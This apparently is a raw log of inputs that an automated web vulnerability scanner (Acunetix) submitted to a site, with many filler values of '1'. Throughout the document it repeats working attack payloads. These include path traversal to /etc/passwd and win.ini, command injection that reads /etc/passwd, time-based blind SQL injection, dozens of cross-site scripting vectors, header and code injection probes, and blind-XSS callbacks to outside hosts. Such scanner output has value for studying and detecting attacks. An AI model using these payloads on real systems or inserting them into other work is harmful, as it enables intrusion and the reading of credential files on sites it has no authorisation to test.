cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1&lt

1

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

${99090+99999}

1

-1

<img acu onmouseover=prompt(914617) //>

1

1

1

1

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1<input autofocus onfocus=prompt(977971)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n958498=v923007

1

-1))

)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

<a href='http://www.acunetix.com'>website security</a>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'"()

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

fFiRRrIg'

[url=http://www.acunetix.com]website security[/url]

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

1

testasp.vulnweb.com

Ccqsq3cy')

1_rtJGw <ScRiPt >prompt(958233)</ScRiPt>

1

1

1

'

'

.\./.\./.\./.\./.\./.\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

EZczZn8f'))

1

1

1

"

1

1

"

1

1

1

-1

/etc/passwd

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

http://hitgWr3UmoP7a.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

1

1

comments

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

-1))

1

1

1

http://www.acunetix.tst

'&dir&'

1

comments/.

'"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1'"()&%<ScRiPt >prompt(961532)</ScRiPt>

Nm8PczVF'

1

1

"&dir&"

1

1

<!--

'"()&%<ScRiPt >prompt(904966)</ScRiPt>

1

1

vWHzGYWu')

|dir

1

1

1_959478

arLfjeHZ'))

1

................etc/passwd

1

1

1

'|dir

1

1

1

1

"|dir

1

1

file:///etc/passwd

1

1

acu4986<s1﹥s2ʺs3ʹuca4986

1

/\../\../\../\../\../\../\../etc/passwd

1

1

acux1914z1z2abcxuca1914

1

WEB-INF/web.xml

1

1

1<ScRiPt >prompt(900581)</ScRiPt>

1

1

1

1<script>prompt(988632)</script>

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(977486)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945426></ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(900461)</ScRiPt>

1

response.write(9961583*9066468)

1

../../../../../../../../../../windows/win.ini.jpg

1<video><source onerror="javascript:prompt(983590)">

1

1

1

&cat /etc/passwd&

'+response.write(9961583*9066468)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903777)"></g></svg>

1

windowswin.ini

1

'&cat /etc/passwd&'

"+response.write(9961583*9066468)+"

1<div style=width:expression(prompt(962050))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

"&cat /etc/passwd&"

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1<body onload=prompt(949675)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(937053)>

${99984+100224}

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(950219)>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n926121=v943487

1<img/src=">" onerror=alert(990566)>

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(926294)</sCripT>

1

"|"ld

testasp.vulnweb.com

1

!(()&&!|*|*|

iCmXSLU5'

.\./.\./.\./.\./.\./.\./etc/passwd

1&lt

WEB-INF/web.xml

'"()

1

1

zgDYwLiD')

^(#$!@#$)(()))******

1

WEB-INF\web.xml

'

'

<img acu onmouseover=prompt(972093) //>

/etc/passwd

1

1

1

AXKi59ID'))

1

1

"

1<input autofocus onfocus=prompt(975067)>

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

1

-1)

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

................etc/passwd

1

http://hit3YCVCi4kIA.bxss.me/

&dir

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_baz9f <ScRiPt >prompt(934685)</ScRiPt>

comments

1

1

1

'&dir&'

1

1

1

m7Co8wF0'

file:///etc/passwd

1'"()&%<ScRiPt >prompt(924042)</ScRiPt>

'"

http://www.acunetix.tst

1

1

"&dir&"

1

7ifm9n3b')

/\../\../\../\../\../\../\../etc/passwd

comments

'"()&%<ScRiPt >prompt(919645)</ScRiPt>

<!--

1

1

1

1

|dir

BTII8lch'))

WEB-INF/web.xml

comments/.

1

1_955735

1

1

1

'|dir

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

"|dir

1

../../../../../../../../../../boot.ini

acu4730<s1﹥s2ʺs3ʹuca4730

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux2436z1z2abcxuca2436

1

1

windowswin.ini

1

1<ScRiPt >prompt(917387)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(917383)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(931512)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994633></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(965337)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(958780)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962323)"></g></svg>

1

1

1<div style=width:expression(prompt(945266))>

1

1

WEB-INF/web.xml

response.write(9913377*9390041)

1<iframe src='data:text/html

1

1

1

1

'+response.write(9913377*9390041)+'

1<body onload=prompt(995952)>

WEB-INF\web.xml

1

"+response.write(9913377*9390041)+"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999664)>

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

&cat /etc/passwd&

1

1<img src=xyz OnErRor=prompt(929956)>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(904482)>

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(902925)</sCripT>

"&cat /etc/passwd&"

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1&lt

1

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100188+99363}

1

`cat /etc/passwd`

<img acu onmouseover=prompt(936724) //>

1

-1)

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<input autofocus onfocus=prompt(940693)>

-1))

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1&n902651=v934068

1

1

<a href='http://www.acunetix.com'>website security</a>

1

)

.\./.\./.\./.\./.\./.\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

6wxjwuiB'

'|'ld

1

1

1

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

8TomtyU5')

/etc/passwd

testasp.vulnweb.com

"|"ld

1

1

^(#$!@#$)(()))******

3dz84t5E'))

1_K5FEY <ScRiPt >prompt(944598)</ScRiPt>

'"()

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

1

"

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

"

1

1

http://hitJHbWOaewLf.bxss.me/

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GG5jc4mh'

1

1

1

file:///etc/passwd

&dir

comments

'"

1

MFmEJTdz')

1'"()&%<ScRiPt >prompt(989086)</ScRiPt>

1

1

1

PkTXM6Oo'))

<!--

/\../\../\../\../\../\../\../etc/passwd

comments

'"()&%<ScRiPt >prompt(940213)</ScRiPt>

'&dir&'

1

1

1

WEB-INF/web.xml

1_968934

1

comments/.

1

"&dir&"

1

1

1

WEB-INF\web.xml

1

1

|dir

../../../../../../../../../../windows/win.ini

1

1

acu6628<s1﹥s2ʺs3ʹuca6628

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

acux10145z1z2abcxuca10145

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1<ScRiPt >prompt(993967)</ScRiPt>

1

1

1

1<script>prompt(980367)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(932820)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924717></ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(934247)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(989597)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985272)"></g></svg>

1

1

response.write(9420993*9509668)

&cat /etc/passwd&

1

1<div style=width:expression(prompt(905239))>

WEB-INF/web.xml

1

1

'+response.write(9420993*9509668)+'

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

"+response.write(9420993*9509668)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(972800)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915362)>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img src=xyz OnErRor=prompt(918364)>

`cat /etc/passwd`

1

-1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

${99470+99668}

1<img/src=">" onerror=alert(924857)>

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1&n979097=v951022

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

1

1<ScRiPt%20>prompt(915038)</sCripT>

)

-1))

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1

!(()&&!|*|*|

1&lt

H4OAUBTM'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

9V1Zmz67')

'"()

1

^(#$!@#$)(()))******

testasp.vulnweb.com

<img acu onmouseover=prompt(950954) //>

QvoiwXXo'))

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

'

1

1

1

1<input autofocus onfocus=prompt(932887)>

1

-1

"

/etc/passwd

1

1

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit93pC1BKC5F.bxss.me/

acunetix_wvs_invalid_filename

1

1

1_p5Z6r <ScRiPt >prompt(951991)</ScRiPt>

bZlbdf8v'

&dir

................etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

OFCEVcWm')

1

1

'&dir&'

comments

1

1

http://www.acunetix.tst

1

8PvJ4BWD'))

'"

comments/.

1

file:///etc/passwd

<!--

1'"()&%<ScRiPt >prompt(946335)</ScRiPt>

1

"&dir&"

1

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(921785)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

1_943888

1

WEB-INF/web.xml

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu3076<s1﹥s2ʺs3ʹuca3076

1

../../../../../../../../../../boot.ini

1

1

1

acux9981z1z2abcxuca9981

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(961323)</ScRiPt>

windowswin.ini

1

1<script>prompt(931444)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(927711)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917277></ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(982883)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(990126)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9528245*9884212)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976782)"></g></svg>

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(957950))>

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9528245*9884212)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

1

1

1

"+response.write(9528245*9884212)+"

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937445)>

"&cat /etc/passwd&"

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968165)>

cat /etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(907588)>

1

1

`cat /etc/passwd`

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(992383)>

1

${99573+99904}

1

1

|cat /etc/passwd#

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(978121)</sCripT>

1

1&n913597=v918558

1

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

-1)

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

"|"ld

1

<img acu onmouseover=prompt(909961) //>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'"()

1<input autofocus onfocus=prompt(994348)>

9h0z4rYw'

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

ZUyv6nSf')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

"

1

1

[url=http://www.acunetix.com]website security[/url]

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

3r8j2Ee0'))

1

${@print(md5(acunetix_wvs_security_test))}

1

1_skZaV <ScRiPt >prompt(945227)</ScRiPt>

"

1

1

1

http://hitq3NXgfvIBA.bxss.me/

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1

-1)

comments

1

................etc/passwd

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

-1))

1

http://www.acunetix.tst

'&dir&'

'"

1

1

1

comments/.

ZPhWa8qR'

<!--

1

DZmZs1d3')

1

1'"()&%<ScRiPt >prompt(936681)</ScRiPt>

1

file:///etc/passwd

1

THPJryrp'))

"&dir&"

1

1

'"()&%<ScRiPt >prompt(973346)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

1

1

1_934751

1

WEB-INF/web.xml

'|dir

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

acu3905<s1﹥s2ʺs3ʹuca3905

1

../../../../../../../../../../windows/win.ini

acux2232z1z2abcxuca2232

1

1

1<ScRiPt >prompt(984244)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<script>prompt(963942)</script>

1

1

1<ScRiPt >prompt(932236)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946735></ScRiPt>

1

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(962038)</ScRiPt>

1

1

................windowswin.ini

1

1<video><source onerror="javascript:prompt(981901)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(955617)"></g></svg>

1

1

1

response.write(9396870*9987172)

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<div style=width:expression(prompt(942515))>

1

1

'+response.write(9396870*9987172)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9396870*9987172)+"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<body onload=prompt(956547)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918563)>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF/web.xml

1<img src=xyz OnErRor=prompt(917799)>

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

1<img/src=">" onerror=alert(924266)>

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99546+100072}

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1<ScRiPt%20>prompt(960723)</sCripT>

1&n912015=v946235

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

|cat /etc/passwd#

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

1

)

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

<img acu onmouseover=prompt(958865) //>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

-1

^(#$!@#$)(()))******

1

'

1<input autofocus onfocus=prompt(995307)>

'"()

1

"|"ld

testasp.vulnweb.com

1

-1)

/etc/passwd

"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

a9Wgg8MF'

1

1_ITrSK <ScRiPt >prompt(920439)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

................etc/passwd

"

1

1

http://hitwnmHGj32Z6.bxss.me/

FiEKOD3A')

1

1

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

YrE6kM5E'))

1

&dir

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

-1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'&dir&'

http://www.acunetix.tst

1

1

comments

-1)

'"

1

1'"()&%<ScRiPt >prompt(905722)</ScRiPt>

WEB-INF/web.xml

"&dir&"

1

comments/.

1

<!--

1

-1))

'"()&%<ScRiPt >prompt(917005)</ScRiPt>

|dir

WEB-INF\web.xml

1

1

1

1

yFz2obO6'

1_956483

../../../../../../../../../../windows/win.ini

'|dir

1

1

1

ZZbyGvEN')

1

../../../../../../../../../../boot.ini

1

"|dir

ixZd4WWW'))

1

acu1640<s1﹥s2ʺs3ʹuca1640

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

acux3845z1z2abcxuca3845

windowswin.ini

1

1

1<ScRiPt >prompt(961928)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(979312)</script>

1

1<ScRiPt >prompt(914117)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945864></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt >prompt(998651)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(941623)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9488033*9368747)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988809)"></g></svg>

1

1

'+response.write(9488033*9368747)+'

1

1

1<div style=width:expression(prompt(926540))>

WEB-INF/web.xml

1

&cat /etc/passwd&

1

"+response.write(9488033*9368747)+"

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(901407)>

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966678)>

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(929788)>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(983132)>

1

1

-1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

1

${100327+99964}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(967400)</sCripT>

1

1

-1)

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n982733=v922452

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

-1))

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<img acu onmouseover=prompt(920802) //>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

'"()

AY8Py0UJ'

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(920873)>

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

1

Z6EmHihr')

1

'

1

/etc/passwd

1

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

"

jvXRI4Me'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

||cat /etc/passwd

1_xEcdx <ScRiPt >prompt(913737)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

&dir

1

1

http://hitg4ygPnfKyQ.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

................etc/passwd

comments

-1))

1

1

"&dir&"

1

1

1

|dir

comments

http://www.acunetix.tst

'"

5Afogp7C'

1'"()&%<ScRiPt >prompt(944952)</ScRiPt>

1

comments/.

'|dir

file:///etc/passwd

JsDa4gYo')

<!--

1

'"()&%<ScRiPt >prompt(966603)</ScRiPt>

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

tDV1kfq1'))

"|dir

1

1

1_959638

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu10205<s1﹥s2ʺs3ʹuca10205

1

../../../../../../../../../../boot.ini

1

acux9829z1z2abcxuca9829

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(999645)</ScRiPt>

1

1

1

1<script>prompt(939903)</script>

windowswin.ini

1

................windowswin.ini

1

1<ScRiPt >prompt(921680)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994921></ScRiPt>

1

1

1

1<ScRiPt >prompt(981304)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

